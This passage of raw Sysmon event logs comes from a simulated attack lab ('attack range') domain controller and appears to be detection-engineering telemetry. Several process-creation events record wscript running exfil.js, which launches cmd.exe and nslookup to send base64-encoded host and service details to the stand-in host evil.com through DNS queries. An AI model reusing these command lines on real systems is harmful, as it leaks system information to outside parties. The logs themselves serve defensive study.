:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.608{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.608{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.608{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4E45-000000005F02}3192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.608{2E1864BB-18F7-629A-4C45-000000005F02}47842604C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-4E45-000000005F02}3192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.615{2E1864BB-18F7-629A-4E45-000000005F02}3192C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F7-629A-4C45-000000005F02}4784C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpxcqd.tmp 2>&1 10341000x8000000000000000213040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.570{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-4D45-000000005F02}1488C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.570{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-4D45-000000005F02}1488C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.570{2E1864BB-18F7-629A-4D45-000000005F02}14887392C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-4C45-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.554{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4D45-000000005F02}1488C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.554{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.554{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.554{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.554{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.554{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4C45-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.554{2E1864BB-18E0-629A-6742-000000005F02}39764592C:\Windows\System32\WScript.exe{2E1864BB-18F7-629A-4C45-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.558{2E1864BB-18F7-629A-4C45-000000005F02}4784C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpxcqd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000213029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.337{00000000-0000-0000-0000-000000000000}8012<unknown process>-udptruefalse127.0.0.1-51032-false127.0.0.1-53domain 354300x8000000000000000213028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.276{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-51031-false127.0.0.1-53domain 23542300x8000000000000000213027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.539{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgoyf.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.523{2E1864BB-18F7-629A-4A45-000000005F02}73247072C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-4B45-000000005F02}8152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.523{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.523{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.523{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.523{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.523{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4B45-000000005F02}8152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.523{2E1864BB-18F7-629A-4945-000000005F02}62162512C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-4B45-000000005F02}8152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.528{2E1864BB-18F7-629A-4B45-000000005F02}8152C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F7-629A-4945-000000005F02}6216C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgoyf.tmp 2>&1 10341000x8000000000000000213018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.492{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-4A45-000000005F02}7324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.492{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-4A45-000000005F02}7324C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.488{2E1864BB-18F7-629A-4A45-000000005F02}73247072C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-4945-000000005F02}6216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.470{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4A45-000000005F02}7324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.454{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.454{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 